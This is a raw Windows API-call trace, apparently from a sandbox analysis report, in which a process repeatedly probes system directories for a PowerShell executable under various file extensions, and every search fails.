	[0325.196] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.125] SetErrorMode (uMode=0x1) returned 0x1
	[0326.126] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.127] SetErrorMode (uMode=0x1) returned 0x1
	[0326.127] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.134] SetErrorMode (uMode=0x1) returned 0x1
	[0326.136] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.136] SetErrorMode (uMode=0x1) returned 0x1
	[0326.136] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.144] SetErrorMode (uMode=0x1) returned 0x1
	[0326.145] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.145] SetErrorMode (uMode=0x1) returned 0x1
	[0326.145] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.154] SetErrorMode (uMode=0x1) returned 0x1
	[0326.155] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.155] SetErrorMode (uMode=0x1) returned 0x1
	[0326.155] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.163] SetErrorMode (uMode=0x1) returned 0x1
	[0326.165] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.165] SetErrorMode (uMode=0x1) returned 0x1
	[0326.165] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.046] SetErrorMode (uMode=0x1) returned 0x1
	[0327.047] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0327.047] SetErrorMode (uMode=0x1) returned 0x1
	[0327.047] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.055] SetErrorMode (uMode=0x1) returned 0x1
	[0327.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.057] SetErrorMode (uMode=0x1) returned 0x1
	[0327.057] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.057] SetErrorMode (uMode=0x1) returned 0x1
	[0327.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.058] SetErrorMode (uMode=0x1) returned 0x1
	[0327.058] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.058] SetErrorMode (uMode=0x1) returned 0x1
	[0327.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.058] SetErrorMode (uMode=0x1) returned 0x1
	[0327.058] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.059] SetErrorMode (uMode=0x1) returned 0x1
	[0327.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.059] SetErrorMode (uMode=0x1) returned 0x1
	[0327.059] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.059] SetErrorMode (uMode=0x1) returned 0x1
	[0327.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.059] SetErrorMode (uMode=0x1) returned 0x1
	[0327.060] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.060] SetErrorMode (uMode=0x1) returned 0x1
	[0327.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.060] SetErrorMode (uMode=0x1) returned 0x1
	[0327.060] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.060] SetErrorMode (uMode=0x1) returned 0x1
	[0327.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.061] SetErrorMode (uMode=0x1) returned 0x1
	[0327.061] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.061] SetErrorMode (uMode=0x1) returned 0x1
	[0327.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.061] SetErrorMode (uMode=0x1) returned 0x1
	[0327.061] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.062] SetErrorMode (uMode=0x1) returned 0x1
	[0327.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.062] SetErrorMode (uMode=0x1) returned 0x1
	[0327.062] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.062] SetErrorMode (uMode=0x1) returned 0x1
	[0327.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.062] SetErrorMode (uMode=0x1) returned 0x1
	[0327.063] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.063] SetErrorMode (uMode=0x1) returned 0x1
	[0327.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.063] SetErrorMode (uMode=0x1) returned 0x1
	[0327.063] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.063] SetErrorMode (uMode=0x1) returned 0x1
	[0327.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.064] SetErrorMode (uMode=0x1) returned 0x1
	[0327.064] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.064] SetErrorMode (uMode=0x1) returned 0x1
	[0327.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.064] SetErrorMode (uMode=0x1) returned 0x1
	[0327.064] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.065] SetErrorMode (uMode=0x1) returned 0x1
	[0327.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.065] SetErrorMode (uMode=0x1) returned 0x1
	[0327.065] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.065] SetErrorMode (uMode=0x1) returned 0x1
	[0327.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.065] SetErrorMode (uMode=0x1) returned 0x1
	[0327.066] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.066] SetErrorMode (uMode=0x1) returned 0x1
	[0327.066] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.066] SetErrorMode (uMode=0x1) returned 0x1
	[0327.066] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.066] SetErrorMode (uMode=0x1) returned 0x1
	[0327.067] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.067] SetErrorMode (uMode=0x1) returned 0x1
	[0327.067] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.067] SetErrorMode (uMode=0x1) returned 0x1
	[0327.067] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.067] SetErrorMode (uMode=0x1) returned 0x1
	[0327.067] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.068] SetErrorMode (uMode=0x1) returned 0x1
	[0327.068] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.068] SetErrorMode (uMode=0x1) returned 0x1
	[0327.068] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.068] SetErrorMode (uMode=0x1) returned 0x1
	[0327.068] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.068] SetErrorMode (uMode=0x1) returned 0x1
	[0327.069] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.069] SetErrorMode (uMode=0x1) returned 0x1
	[0327.069] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.069] SetErrorMode (uMode=0x1) returned 0x1
	[0327.069] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.069] SetErrorMode (uMode=0x1) returned 0x1
	[0327.069] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.070] SetErrorMode (uMode=0x1) returned 0x1
	[0327.070] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.070] SetErrorMode (uMode=0x1) returned 0x1
	[0327.070] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.070] SetErrorMode (uMode=0x1) returned 0x1
	[0327.070] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.070] SetErrorMode (uMode=0x1) returned 0x1
	[0327.071] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.071] SetErrorMode (uMode=0x1) returned 0x1
